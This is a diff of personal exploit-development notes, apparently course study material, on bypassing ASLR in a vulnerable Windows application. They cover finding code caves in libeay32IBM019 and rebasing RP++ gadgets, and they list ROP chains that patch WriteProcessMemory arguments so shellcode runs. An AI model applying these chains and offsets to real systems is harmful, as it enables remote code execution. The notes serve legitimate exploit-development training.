BGuerrero825/Cyber-Notes/Offensive Security/Stack Overflows and ASLR Bypass.md

 	1. dd libeay32IBM019 +0x108 + 2c
 	2. Code Segment Offset: 00001000 (from base addr)
 2. ? libeay32IBM019 + 1000 = 031c1000
-3. !address 032c1000
+3. `!address 032c1000`
 4. see End Address: 03250300
-5. subtract an arbitrary large space (400) from End Address to determine if there's space to write a shellcode in the code cave
+5. subtract an arbitrary large space (400) from End Address to determine if there's space to write a shellcode in the code cave, increment upwards if still hitting all 00's
-6. see a bunch of 00's?
-Then this is unused space we can use
+6. 00's start at -0x934 bytes from End Address, all of that space is usable
-7. Protections are still PAGE_EXECUTE_READ
+7. `!vprot ADDR` Protections are still PAGE_EXECUTE_READ
 8. Find the offset into the module where the code cave starts
-	1. 03253000 - 400 - libeay32IBM019 = 00092c00
+	1. 03253000 - 0x934 - libeay32IBM019 = 000926cc
-	1. this has a null byte, but we can just use 092c04 instead
+	1. If theres a null byte, use an adjacent address
-9. So lpBaseAddress will be libeay32IBM019 + 092c04
+9. lpBaseAddress will be libeay32IBM019 + 0x000926cc

 Find Unused Memory in the Data Section:
 > `!dh` is also applicable for finding the Code Section
 1. !dh -a libeay32IBM019, to dump data section and header info
 	1. Look for: SECTION HEADER #4 // .data name // F018 virtual size // D5000 virtual address
-	2. size is 0xf018 and offset is 0x5000
+	2. size is 0xf018 and offset is 0xd5000
 2. Again, this is page aligned and any unused space is nulled, so find the "data cave" using the previous info
 3. ? libeay32IBM019 + d5000 + f018 + 4 = 032a401c
 4. dd 032a401c, shows a bunch of null bytes
 5. !vprot ADDR, shows the section is set as PAGE_READWRITE
 6. ?
 ADDR - libeay32IBM019, shows offset of data writeable section from base address

-Make the API call with ROP
+7. There also exists empty memory space before the end of the allocated region, which may (?) be used.
+In this case, I used libeay... +  0x000e1e98

+### Dump ROP Gadgets
+Use RP++
+Remember that since ALSR is activated, the ROP gadgets will not be at the address listed in the RP++ output, RP++ uses the preferred base for its addresses.
+1. `dd libeay32ibm019 + 108 + 34` : where 0x108 = offset to PE header, 0x34 = offset to ImageBase
+2. ImageBase is 0x10000000
+3. All ROP gadgets will be at listed address - 0x10000000 + base_address (from prior memory leak)
+	1.  `rop += pack('<L', base+0x000010c2) # pop ecx ; ret`

+>At this point, I am utilizing the information leak vulnerability twice to save two critical addresses.
+- The address of WriteProcess memory at runtime
+- The base address of libeay32ibm019 at runtime (by requesting an arbitrary function within it)
-- Set up the python script to the point where it triggers the scanf buffer overflow
+> Set up the python script to the point where it triggers the scanf buffer overflow from before (opcode 0x534) after gathering the above addresses

-- ROP Skeleton for WriteProcessMemory goes in psCommandBuffer (PUT CODE HERE)
-	- WriteProcessMemory address, known by ASLR (will be pointed to by the eip overwrite)
-	- shellcode address (rop chain returns here after WPM)
-	- (start args for WPM) Handle is -1
-	- lpBaseAddress (destination) is module + code cave offset
-	- lpBuffer (from) address is not known yet, will be shellcode address on stack
-	- lpNumberOfBytesWritten is the base + offset to empty data section
+### WriteProcessMemory Skeleton

+The general structure of the overflow buffer will be:
+1. Structured good input until vulnerable copy operation
+2. Spam until return overwrite
+3. Skeleton WPM call
+4. Initial EIP control ROP gadget
+5. Pointer to WPM call ROP
+6. Patch arguments to WPM call ROP
+7. Move execution to WPM call ROP
+8. Shellcode

+See python script `fastback_aslr_exploit.py` for specific implementations

+Some arguments staged for the WPM call will be overwritten before execution flow is hijacked, some will have bad characters, and others have to be calculated at runtime.
+They cannot be relied upon to be input correctly and should be inspected and patched in if needed.

-ROP chain creation
+### ROP chain creation
-- Since ASLR is on, given ROP address from rp++ are not accurate. rp++ calculates from the PE header preferred base address, so we need to subtract the base to get the offset.
+1. Since ASLR is on, given ROP address from rp++ are not accurate. rp++ calculates from the PE header preferred base address, so we need to subtract the base to get the offset.
 In exploit use `dllBase + OFFSET` instead of the raw value given by rp++
-- D:  `dd libeay32IBM019 + 3c L1`
-	- PE header offset value stored at 0x3c from module start
-- D:  `dd libeay32IBM019 + 108 + 34 L1`
-	-  ImageBase (Preferred base address) is at offset 0x34 in PE header
-- Outputs value 0x10000000
-ROP chain to set lpBuffer
-Align a register (eax) to the dummy shellcode location on the stack
-- `push esp ; pop esi ; ret  # store a copy of esp
-- `mov eax, esi ; pop esi ; ret  # move value to eax for manipulation`
-	- pack junk
-- `pop ecx ; ret  # pop in large value avoiding bad chars`
-	- pack 0x77777878
-- `add eax, ecx ; ret  # add large val to eax`
-- `pop ecx ; ret  # pop in another large val to trigger bit overflow`
-	- pack 0x88888888
-- `add eax, ecx ; ret  # add large val to eax`
-- 0x77777878 + 0x88888888 = 0x...1'00000100 (where the 33rd bit is overflowed)
-- `mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010  # move eax val to ecx`
-	- oof lots of side effects
-	- pack junk for pop into esi
-- `pop eax ; ret  # pop val (-0x120) into eax`
-	- pack junk x4 for previous retn 0x0010 (used in stdcall convention where callee cleans out stack args, in this case 4 args)
-	- pack 0xfffffee0 for pop
-- `add eax, ecx ; ret`
-- `mov [eax], ecx ; ret  # place shellcode adderss in lpBuffer argument location`

-ROP chain to set nSize (size of shellcode)
-- `inc eax ; ret  # move pointer by 1 byte toward next arg on stack`
-	- x4 to move a word
-- `push eax ; pop esi ; ret  # save the argument addr in eax to new reg esi`
-- `pop eax ; ret  # pop -524 into eax (shellcode size approx)`
-	- pack 0xfffffdf4
-- `neg eax ; ret  # negate`
-- `mov ecx, eax ; mov eax, esi ; pop esi ; ret 0x0010  # move 524 to ecx, move back argument addr to eax`
-	- side effectsssssss
-	- pack junk for pop into esi
-- `mov [eax], ecx ; ret  # move 524 into nSize argument`
-	- pack junk x4 for retn 0x0010
+1. D:  `dd libeay32IBM019 + 3c L1`
+	1. PE header offset value stored at 0x3c from module start
+2. D:  `dd libeay32IBM019 + 108 + 34 L1`
+	1. ImageBase (Preferred base address) is at offset 0x34 in PE header
+3. Outputs value 0x10000000
+4. ROP chain to set lpBuffer
+5. Align a register (eax) to the dummy shellcode location on the stack
+6. `push esp ; pop esi ; ret  # store a copy of esp
+7. `mov eax, esi ; pop esi ; ret  # move value to eax for manipulation`
+	1. pack junk
+8. `pop ecx ; ret  # pop in large value avoiding bad chars`
+	1. pack 0x77777878
+9. `add eax, ecx ; ret  # add large val to eax`
+10. `pop ecx ; ret  # pop in another large val to trigger bit overflow`
+	1. pack 0x88888888
+11. `add eax, ecx ; ret  # add large val to eax`

+ROP chain to patch lpBaseAddress
+1. 0x77777878 + 0x88888888 = 0x...1'00000100 (where the 33rd bit is overflowed)
+2. `mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010  # move eax val to ecx`
+	1. oof lots of side effects
+	1. pack junk for pop into esi
+3. `pop eax ; ret  # pop val (-0x120) into eax`
+	1. pack junk x4 for previous retn 0x0010 (used in stdcall convention where callee cleans out stack args, in this case 4 args)
+	1. pack 0xfffffee0 for pop
+4. `add eax, ecx ; ret`
+5. `mov [eax], ecx ; ret  # place shellcode address in lpBuffer argument location`

+ROP chain to patch nSize (size of shellcode)
+1. `inc eax ; ret  # move pointer by 1 byte toward next arg on stack`
+	1. x4 to move a word
+2. `push eax ; pop esi ; ret  # save the argument addr in eax to new reg esi`
+3. `pop eax ; ret  # pop -524 into eax (shellcode size approx)`
+	1. pack 0xfffffdf4
+4. `neg eax ; ret  # negate`
+5. `mov ecx, eax ; mov eax, esi ; pop esi ; ret 0x0010  # move 524 to ecx, move back argument addr to eax`
+	1. side effectsssssss
+	1. pack junk for pop into esi
+6. `mov [eax], ecx ; ret  # move 524 into nSize argument`
+	1. pack junk x4 for retn 0x0010

 test rop chain pushes args
 - `bp libeay32IBM019+0x1fd8`, breakpoint on gadget that sets stack values